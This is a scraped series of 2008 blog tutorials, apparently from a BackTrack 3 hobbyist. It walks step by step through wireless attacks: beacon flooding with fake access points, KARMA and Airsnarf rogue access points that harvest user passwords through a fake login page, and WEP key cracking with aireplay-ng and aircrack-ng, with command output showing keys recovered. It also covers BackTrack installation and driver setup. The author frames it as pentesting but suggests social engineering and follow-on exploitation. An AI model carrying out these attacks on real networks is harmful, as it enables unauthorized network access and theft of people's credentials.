* The Time::HiRes Perl module. [OPTIONAL] This is available from CPAN and allows you to specify sleep times in sub-second increments. Not needed if you are happy with whole second delays.
* The Getopt::Long Perl module. This is available from CPAN and is required for processing of command line arguments passed to airraid.
* macchanger. This is a very handy little utility. It is available here or from various other places. There are many binaries already compiled. It is required to effectively change the MAC address of the wireless card.
* Linux or some form of *nix. Of course.
* Root (superuser) access. I don’t know this for a fact but I suspect you need to be root to manipulate some of the ifconfig and iwconfig commands.

goto /pentest/wireless/airraid-0.1/
make some modifications to groupfile-example.dat and put some of AP details in following manner
bssid,essid,WEP y/n,channel
for example I entered
00:21:29:68:16:C2,thunderbolt,Y,11
00:39:67:12:33:W2,UTStarcom,Y,11
00:98:G3:VV:23:55,netgear,Y,6
00:56:F5:JP:23:44,beetel,Y,4
22:66:g6:78:34:11,Ubiquiti,Y,7
34:77:88:1V:H8,S0,wifi0wn,Y,2
00:1E:40:14:F6:D4,PRAVEEN,Y,11

save and close it

nano airraid.pl

edit my @words= put these strings in end.its random generation of ESSID’s.
my @words = ( “Access Point”, “tsunami”, “host”, “airport”, “linksys”, “Netgear”, “Cisco”, “Wireless”, “2wire”, “intel”, “WLAN” , “thunderbolt” , “UTStarcom” , “beetel” , “Ubiquiti”, “wifi0wn” , “PRAVEEN”);

bt~#airraid.pl –interface ath0

This is about as simple as you can go. This will generate fully random (wireless) MAC addresses, no WEP (open), full power, use a random assortment of the built-in default ESSIDs, sleep for the default (0.6 sec) between generations, and use all available channels. The MACs will, in all likelihood, almost never be repeated so any scanners will see a nearly infinite number of APs if they watch long enough.For testing it I monitored using another wireless interface.

bt~#airodump rausb0
(Check that all the FakeAP is having encryption type OPN)

bt~#airodump rausb0
(Check that all the FakeAP is having encryption type OPN)

bt~#airraid.pl –interface ath0 –power 20 –wep 1

This one creates a bit more variety on the airwaves. This will generate fully random (wireless) MAC addresses, randomly assign WEP keys to all of the APs, vary power between 0 mW and 20 mw (or the max of the card), use a random assortment of the built-in default ESSIDs and use all available channels. Similar to the example above, this will create a nearly infinite number of APs.For testing it use

bt~#airodump-ng rausb0
(Check all the FakeAP’s now showing encryption type as WEP)

bt~#airraid.pl –interface ath0 –power 20 –gf groupfile-example.dat

My personal favorite. This will vary power between 0 mW and 20 mw (or the max of the card) but pull all other information from the groupfile called groupfile-example.dat which contains all the information necessary to create n bogus APs. This will cycle through these n APs in random order, sending out beacons.

bt~#airodump-ng rausb0
(Check that FakeAP is throwing Becons randomly & acting as Real AP like.)

Project homepage: http://theta44.org/karma/index.html

“KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID.  Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host.” -http://theta44.org

first of all install the latest madwifi snapshots here

http://snapshots.madwifi.org/madwifi-trunk/madwifi-trunk-r3813-20080720.tar.gz

bt ~#tar -zxvf madwifi-trunk-r3813-20080720.tar.gz

bt ~#cd madwifi-trunk-r3813-20080720

bt ~#make && make install

bt ~ # ln -s  /sbin/iwconfig  /usr/sbin/iwconfig
bt ~# ln -s  /sbin/iwpriv  /usr/sbin/iwpriv
bt ~#  ln -s  /sbin/iwevent  /usr/sbin/iwevent
bt ~# airmon-ng start ath0
bt ~#airmon-ng start wifi0

Putting the card into monitor mode

bt ~#wlanconfig ath0 destroy

bt ~#wlanconfig ath0 create wlandev wifi0 wlanmode master

goto karma directory

karma.xml – “Runs a rogue base station with DHCP, DNS and HTTP services.  The HTTP service re-directs all requests to the ExampleWebExploit module that displays a simple HTML page.  This page can be replaced with something that informs the user that their wireless settings are insecure and that it may be a violation of corporate policy etc” -http://theta44.org

bt karma#bin/monitor-mode.sh ath0

bt karma#(cd ./src/ && make) && ./src/karma ath0

bt karma#

bt karma#bin/karma  etc/karma.xml

Now the rogue services are started any probing clients will now connect to KARMA on our machine whichever SSID their machine chooses to use.

Iwconfig output showing ath0 working as RogueAP.we can see bssid of RogueAP

We can see our FakeAP is working now and broadcasting BSSID & other clients probing for legitimate AP automatically connects with our rogueAP

karma-scan.xml – “Attempts to find insecure wireless clients that will associate to rouge network and possibly obtain IP address via DHCP”. -http://theta44.org

bt karma#bin/karma etc/karma-scan.xml

karma.scan.xml

This tool have layer attack approach.I am still working on it so that we can lauch more attack like Nmap scanning and metasploit for exploit the known vulnerabilites.

]]> http://wifi0wn.wordpress.com/2008/07/20/karma-rogueappowerfull-wireless-pen-testing-tool/feed/ 9 wifi0wn http://wifi0wn.wordpress.com/2008/07/19/airsnarf-the-rogue-access-pointbacktrack-3-as-fake-ap/ http://wifi0wn.wordpress.com/2008/07/19/airsnarf-the-rogue-access-pointbacktrack-3-as-fake-ap/#comments Sat, 19 Jul 2008 19:54:37 +0000 wifi0wn http://wifi0wn.wordpress.com/?p=37 ]]> Most probably you people wont be trsuting the point that a Linux machine can act as a Access-point but its true.Atheros chipset based cards can act as Access-point or Master mode.for checking that your card support to act as an AP.I have tested it on Backtrack3 final.Using Netgear WG311T A/G/N AR 2414 Chipset
(patched madwifi-ng drivers) with 7 dbi Antenna & Linksys WUSB54GC (RT73 chipset).Netgear PCI Card I made as Rogue AP & Through my other card I Scanned the avaliable AP and got the Rogue Ap Working in OPN Authentication mode.voila
use this command to verify your card about Airsnarf specifications:-

wlanconfig ath0 create wlandev wifi0 wlanmode master/ap    #use either master or ap

this command makes an WIRELSS NIC acting as AP.

I have attached a custom coded file which makes airsnarf a truly immersive Legitimate looking AP.download it and Unzip it.DOWNLOAD

#replace  the file  airsnarf.cfg with /pentest/wireless/airsnarf-0.2/cfg/airsnarf.cfg

#For wireless interace I would recommend Atheros Chipset based cards as the airsnarf
tries to make NIC card as Access point which is possible using MADWIFI-NG drivers only
and those are atheros based chipset.

#place dhcpd.src /pentest/wireless/airsnarf-0.2/bin

#replace airsnarf.cgi with /pentest/wireless/airsnarf-0.2/cfg/cgi-bin/airsnarf.cgi

#replace my index.html in path /pentest/wireless/airsnarf-0.2/cfg/html & /var/www/htdocs

#replace airsnarf.jpg with my airsnarf.jpg in /pentest/wireless/airsnarf-0.2/cfg/html & /var/www/htdocs

#copy apache_pb22_ani.gif from /var/www/htdocs & paste in /pentest/wireless/airsnarf-0.2/cfg/html.

#that is all we have done.made a legally looking webpage for login.

#cd /pentest/wireless/airsnarf-0.2 airsnarf0.2
#./airsnarf
(paswords will be store in /tmp/airsnarf_pwds.txt)

Setting the ROGUE AP name as Wifi0wn & DHCP Network ID And Router IP.

Starting the Airsnarf Script to Work As Rogue AP.Great tool for showing the vulnerabilites in Windows Connection manager.

With my another USB Wireless NIC linksys WUSB54GC I am scanning the avaliable network.where I can see my fake AP is Also getting work by name wifi0wn with open authentication,54 Mbps and on channel 1.

now with my other card I am trying to get an IP from wifi0wn and connect without any key.

You can see that ath0 is working as an Access-point having random MAC ID and my rausb0/linksys adapter got connected with Rogue AP.

In ifconfig we can see that rausb0 got IP address from the ROGUE DHCP Server of Airsnarf

Now when you will surf you will get such login-page which is totally legitimate look.thanks to me to code it and redirecting it.

Redirection of url after hacking username & Password.

Default location of password is /tmp/airsnarf_pwds.txt.

List of username along with passwords

This tool is still in progress.I am making it to work more worsely like redirecting to some website,XSS.use it for social-engineering and vulnerability assessment test.now you can show that anaware user can connect to fakeAP without their knowledge and which can leads to compromise their data.once connecting with AP now you can run the Nmap Scan along with Metapsloit Framework,sniffers like wireshark for getting HTTP,HTTPS,FTP,TELNET Passwords & Many more sofisticated attacks.(USE FOR PT & VA Only)

airodump-ng wifi0
#copy bssid of the AP and press ctrl+c
airodump-ng -c 11 -w thunderbolt –bssid 00:21:29:68:16:C2 rausb0
#-c channel on which AP is working
#-w writing captured data
#–bssid MAC of AP
#wireless device-name like atho,wifi0,wlan0,rausb0,eth0

keep this window running and open new terminal

aireplay-ng -1 0 -e thunderbolt -a 00:21:29:68:16:C2 -h 00:21:29:65:38:42 rausb0

#-e essid is Extensible Service Set Identifier or AP Hostname

#-h MAC of Wireless Device

Got Authenticated & Association with AP

aireplay-ng -4 -h 00:21:29:65:38:42 -b 00:21:29:68:16:C2 rausb0

#-4 Arp Replay attack of Aireplay-ng

#-h MAC Address of wireless

#-b bssid or MAC of AP

Arp Replay attack in action see the AP.the data packets are increasing superfastly.wonderfull

Copy the XOR filename after this command fully executed

packetforge-ng -0 -a 00:21:29:68:16:C2 -h 00:21:29:65:38:42 -k 255.255.255.255 -l 255.255.255.255 -y replay123456.xor -w arp-request

#use packetforge-ng to make the XOR file usable to cracking into aircrack-ng

aireplay-ng -2 -h 00:21:29:65:38:42 -r arp-request rausb0

#save the reply in capture file for later cracking in aircrack-ng

aircrack-ng -n 128 -z -f 1 -e thunderbolt -b 00:21:29:68:16:C2 thunderbolt*.cap

#-n number of WEP bits key applied.ex. 64,128,256 bit

#cap capture file which we mentioned in airodump command.

We got the key decrypted 100% correctly

BackTrack 3 DVD Installation On Hard-Disk

boot BackTrack 3 using ISO DVD

First after booting KDE 3.5
click KDE menu
System
System Information
Storage Device
here you will get list of all mounted devices
for a hazel free installation it is necessary that you unmount all the physical partitions because by default after booting using live DVD backtrack will mount all partitions.

Choose partition
right click
unmount
(repeat steps for all physical mounted partitions)

For E.G my Hard-Disk Partition Table Is:

Now you got a rough idea which all partitions are to be unmounted(e.g.hdc1,hda7,hda5,hda6,hda1,hdc5)

hda-first hard-disk
hdc-second hard-disk

I am assuming you are using hdc

open xterm
bt~#fdisk /dev/hdc

p (view partition table)

n (create new partition at this point if you getting error no free sectors delete one of partition(warning:all data would be lost on that partition))

p (primary)

1 (partition 1)

def(enter)

+4200M (size for partition one.its root.storing files,downloaded data)

n (new partition)

p (primary)

2

def.(enter)

+64M (it would be our boot partition)

n (new partition)

p (primary)

3

def.(enter)

+522M (swap partition,double the amount of system RAM)

p (newly created partition table)

t (table for changing system partition id)

3 (that is our swap partition.def set to 83)

82 (making hdc3 partition as swap by changing its id from 83 to 82)

p (check partition table)

w (save changes)
(at this point if you getting warning:error 16 Device or Resource busy.new partition table would come into effect after next restart then REBOOT.)

bt~#reboot (fdisk recommend this)

bt~#mke2fs /dev/hdc2
bt~#mkswap /dev/hdc3
bt~#swapon /dev/hdc3
bt~#mkreiserfs /dev/hdc1
choose (y/n)y
bt~#mkdir /mnt/backtrack
bt~#mount /dev/hdc1 /mnt/backtrack
bt~#mkdir /mnt/backtrack/boot
bt~#mount /dev/hdc2 /mnt/backtrack/boot
bt~#cp –preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,sr v,var} /mnt/backtrack
bt~#mkdir /mnt/backtrack{mnt,proc,sys,tmp}
bt~#mount –bind /dev /mnt/backtrack/dev
bt~#mount -t proc proc /mnt/backtrack/proc
(at this point you can get error about directory not exist,may be its a bug that even after running aboce mkdir cmd the directory has not been created.go to backtrack directory and make directories by mkdir{mnt,proc,sys,tmp} here you are)
bt~#cp /boot/vmlinuz /mnt/backtrack/boot
bt~#chroot /mnt/backtrack /bin/bash
bt~#nano /etc/lilo.conf

Configure LILO(find & change following configs)
boot = /dev/hda (for knowing which is your boot-disk use fdisk /dev/devicename(e.g./dev/hda or /dev/hdc the one which showing an start * is your boot partition)

timeout=1200 (timeout for LILO boot menu option)

#linux config …
image = /boot/vmlinuz
root = /dev/hdc1 (this is your root partition,the biggest one you created)
label= BaCkTrAcK3(I33t)
read-only
#
other = /dev/hda1
label = WindowsOs(n00b) (here comes ms n00b O.S full with bugs lol)
table = /dev/hda (disk where your Microsoft OS Resides)

save using ctrl + o & press enter
come out using ctrl + x
bt~/#cd \
bt~#lilo -v (remember its very important step to tell lilo which operating system is to be add in lilo boot loader list.if it goes well you have successfully installed the BackTrack 3 DVD version on your hard-disk along with Microsoft OS Dual Booting)
bt~#init 6
Installation of BT 3 on Vmware
I got tutorial on BT3 installation on Vmware.Thanks to respective member.I am modifying it a little to make more comprehensive

tested using Vmware workstation 6.0.0 build-45371
guest os-Linux
version-Other linux 2.6 kernel
networking-choose bridged or NAT
Disk capacity-recommended 7-8GB
now edit settings for this VM
memory-128(if system RAM=256MB)
192/256(if system RAM=512MB)
cdrom-if using ISO DVD using Hard-disk.choose location else default DVD ISO.

boot BT3
open xterm
bt~#fdisk /dev/sda
n
p
1
def(enter)
+6400M
n
p
2
def.(enter)
def(enter)
w

(at this point if you getting warning:error 16 Device or Resource busy.new partition table would come into effect after next restart then REBOOT.)
bt~#init 6
bt~#mkfs.ext3 /dev/sda1
bt~#mkswap /dev/sda2
bt~#mkdir /mnt/backtrack
bt~#mount /dev/sda1 /mnt/backtrack
bt~#exit

goto KDE menu->backtrack->Install Backtrack(Not tested)
Source(Backtrack CD):
Install backtrack to:/mnt/backtrack
Write new MBR(lilo.mbr)to:/dev/sda
Installation method:Real
Uncheck-Restore orignal MBR after lilo (its very imp to UNCHECK this else your whole hard work will go in vain)
Press Install
hang out outside thinking how many tools your are going to work over on BT3 for about 30-40 mins.
after installation
Reboot using KDE menu->logoff->Reboot

download
bt ~ #svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng
bt ~ #cd aircrack-ng
bt aircrack-ng #gmake SQLITE=true
bt aircrack-ng #gmake SQLITE=true install

bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11g ESSID:”" Nickname:”"
Mode:Managed Channel:0 Access Point: Not-Associated
Tx-Power=0 dBm
Retry min limit:7 RTS thr:off Fragment thr=2346 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

bt ~ #modprobe -r iwl3945
bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

bt ~ #modprobe ipwraw

bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wifi0 unassociated ESSID:off/any
Mode:Monitor Channel=1 Bit Rate=54 Mb/s

rtap0 no wireless extensions.

here you are.you have enabled your intel3945 NIC to do discovery/injetion and penetration testing

bt ~ #ifconfig wifi0 down
bt ~ # macchanger –mac 00:10:20:30:40:50 wifi0
Current MAC: 00:ab:ab:ab:ab:ab (unknown)
Faked MAC: 00:10:20:30:40:50 (Welch Allyn, Data Collection)
mac spoofing for security. upto u :)
bt ~ #ifconfig wifi0 up
bt ~ # ifconfig wifi0
wifi0 Link encap:UNSPEC HWaddr 00-10-20-30-40-50-D8-54-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:2346 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:108 (108.0 b)
Interrupt:19 Base address:0×6000 Memory:f4300000-f4300fff
bt ~ # airmon-ng start wifi0

Interface Chipset Driver

wifi0 Centrino a/b/g ipwraw-ng (monitor mode enabled)

bt ~ #airodump-ng wifi0

get the SSID of your network AP
and stop using ctrl+c because we dont want to unnecessariliy capture other ap’s data.

bt ~ # airodump-ng -c 11 -w pentest –bssid 00:08:5C:7B:9E:B5 wifi0
(let the airodump window keep running to capture enough packets)

CH 11 ][ Elapsed: 9 mins ][ 2008-02-20 13:43

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:08:5C:7B:9E:B5 0 100 4537 54723 0 11 54 WEP WEP OPN Narayan-sivenara

BSSID STATION PWR Rate Lost Packets Probes

00:08:5C:7B:9E:B5 00:10:20:30:40:50 0 0- 0 0 73393

bt ~ # aireplay-ng -1 0 -a 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
13:35:08 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11

13:35:08 Sending Authentication Request (Open System) [ACK]
13:35:08 Authentication successful
13:35:08 Sending Association Request [ACK]
13:35:08 Association successful :-)

bt ~ # aireplay-ng -3 -b 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
13:35:56 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11
Saving ARP requests in replay_arp-0220-133556.cap
You should also start airodump-ng to capture replies.
Read 129275 packets (got 54575 ARP requests and 70947 ACKs), sent 83561 packets…(499 pps)

bt ~ # aircrack-ng -n 64 –bssid 00:08:5C:7B:9E:B5 pentest-01.cap
Opening pentest-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 54722 ivs.
KEY FOUND! [ 98:45:00:88:57 ]
Decrypted correctly: 100%

I hope this tutorial will help all the people having Intel3945 NIC for penetration testing and vulnerability test.thanks a lot to exploitz for making such wonderful tutorials and videos.if any mistake you found please let me know I will correct it.I am happy to be a proud member of this so full of knowledge forum with lots of tutorial.
Tested On:
My laptop Specification
compaq presario v3000(v3607TU)
Dual Core 1.6 GHz With 1 MB L2 Cache
Intel 956GM Chipset
120 GB HDD
4 GB Transcend DDR2 667 MHz RAM
Intel X3100 PCI-E
Running OS.Backtrack 3 Beta Dual Boot With Windows Vista
Vmware on Vista Running OS:Windows Server 2003 Enterprise Edition With IIS 6.0/ADS,Windows Xp Professional with SP3 latest updated,Sun Solaris 10,BackTrack 3

My Computer Specification
Pentium 4 1.7 GHz PGA 478 socket
Intel 850 MB orignal MB
1 GB RDRAM PC800 Samsung
200 GB HDD IDE Segate Baracuda 7200 RPM 160 GB + Segate Baracuda 5400 RPM 40 GB
Asus Geforce 2 GTS 128 MB AGP 4x
Running OS Windows XP Pro With SP3 ,Dual Boot With BT 3 Beta karnel 2.6.21.5

Here are proofs

Orignal post by me at Remote-exploit forums:

http://forums.remote-exploit.org/showthread.php?t=12165